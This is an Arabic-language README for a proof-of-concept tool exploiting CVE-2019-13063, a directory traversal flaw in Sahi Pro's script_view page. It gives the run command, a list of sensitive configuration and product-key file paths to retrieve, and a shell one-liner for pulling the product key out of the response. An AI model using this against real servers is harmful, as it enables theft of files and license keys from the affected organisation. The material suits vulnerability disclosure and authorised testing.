
أداة إثبات مفهوم لاستغلال ثغرة اجتياز الدليل وإدراج الملفات المحلية الموجودة في تطبيق ويب Sahi-pro، والمعروفة بـ CVE-2019-13063
تم اكتشاف مشكلة في تطبيق الويب لإدارة النصوص البرمجية Sahi-pro، حيث توجد ثغرة في اجتياز الملفات والأدلة (directory traversal) في المعامل ?script= الموجود في صفحة /Script_view من تطبيق الويب Sahi-pro. يمكن للمهاجم إرسال عنوان URL مصمم خصيصًا لاسترداد وسرقة الملفات الحساسة من الضحية.
هذه أداة إثبات مفهوم لاستغلال ثغرة اجتياز الأدلة والملفات الموجودة في تطبيق الويب Sahi-pro.
التأثير: داخل برنامج تطبيق الويب Sahi-pro، توجد ثغرة في اجتياز الأدلة والملفات تؤدي إلى تسرب معلومات حساسة من التطبيق، أو يمكن استخدامها لسحب ملفات النظام مباشرة.
المعامل ?script= في صفحة script_view عرضة لاجتياز الملفات والأدوات لسرد محتويات الملفات.
قم بتشغيله كالتالي:
$ python3 CVE-2019-13063-POC.py --url http://example:[REDACTED]
سيؤدي هذا إلى تنزيل مفتاح المنتج للتطبيق.
حدد عنوان URL الكامل، بما في ذلك الملف الذي ترغب في تنزيله ملحقًا بالمعامل الضعيف ?script=.
usage: CVE-2019-13063-POC.py [-h] [--url URL]
optional arguments:
-h, --help show this help message and exit
--url URL Specify the vulnerable URL
Sahi User properties file - \sahi_pro\userdata\config\userdata.properties
Sahi data profile - \sahi_pro\userdata\browser\ff\profiles\sahi0\prefs.js
Sahi properties file - \sahi_pro\config\sahi.properties
Sahi Product key location - \config\productkey.txt
سيحاول هذا السكربت فقط تنزيل الصفحة بأكملها، يمكنك بسهولة تحليل المحتوى المطلوب من الصفحة حيث أنه يقع بين عناصر HTML الفريدة <ol><li> باستخدام أمر بسيط في Bash.
مثال لاستخراج مفتاح المنتج:
cat output.txt | grep "<ol><li>" | cut -d ">" -f3 | cut -d "<" -f1
1a79a4d60de6718e8e5b326e338ae533